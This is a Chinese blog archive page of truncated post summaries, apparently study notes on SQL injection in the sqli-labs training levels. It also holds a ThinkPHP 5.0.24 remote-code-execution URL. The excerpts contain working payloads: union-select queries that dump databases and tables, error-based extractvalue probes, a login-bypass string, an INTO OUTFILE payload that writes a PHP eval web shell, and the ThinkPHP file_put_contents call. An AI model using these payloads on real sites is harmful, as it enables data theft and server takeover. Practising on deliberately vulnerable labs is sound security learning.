03 2020 档案
摘要:less18 user-agent的注入 源码分析: check_input对name,password进行了过滤 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = su
阅读全文
摘要:less15 试了很多符号,页面根本不显示别的信息,猜测为盲注 可是怎么检测闭合? 万能密码登录 最终试出来’闭合 uname=1’ or 1=1 # 接下来就要工具跑 less16 同上用万能密码试闭合,工具/脚本跑 less-17 原理https://www.cnblogs.com/laoxia
阅读全文
摘要:less11 抓包 ’ " 实验发现’构成闭合,存在注入点 less-12 a,b都有注入点,b比较好判断闭合 less13 less14
阅读全文
摘要:less-7 https://www.jianshu.com/p/20d1282e6e1d ?id=0’)) union select 1,‘2’,’<?php @eval($_POST["cmd"]);?>’ into outfile ‘D:\phpstudy\WWW\sqli\Less-7\te
阅读全文
摘要:less-5 基于报错的注入 基于报错可以爆出当前数据库名等等 id=2’ and extractvalue(1, concat(0x7c,(select user())));-- # ?id=2’ and extractvalue(1, concat(0x7c,(select @@version)
阅读全文
摘要:less-1 爆库 id=1222’ union select 1,group_concat(schema_name),database() from information_schema.schemata –+# 爆表 ?id=1222’ union select 1,group_concat(t
阅读全文
摘要:闭合条件的探测 数字型注入 burp抓包 分别测试 id=1 and 1=1和id=1 or 1=1 存在漏洞 字符型注入 ’ 报错 探测闭合条件 ’ order by 1# 未报错.构成闭合 同上有两处查询信息 搜索型 xx型 先构造’ xx# 根据报错很容易写出闭合 payload ')unio
阅读全文
摘要:手工注入 查询所有数据库名称和表名 ’ union select 1,table_schema,table_name from information_schema.tables# 发现就两个数据库information_schema与news 查询news数据库中的表的名称 ’ union sel
阅读全文
摘要:分类: 可分为数字型和字符型 直接查id与查字段的区别 sql检测 数字型: select * from table where id=1 and 1=1不报错 select * from table where id=1 and 1=2 报错 字符型 关键在闭合与SQL语句及注释 select *
阅读全文
摘要:payload5.0.24 http:// /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]
阅读全文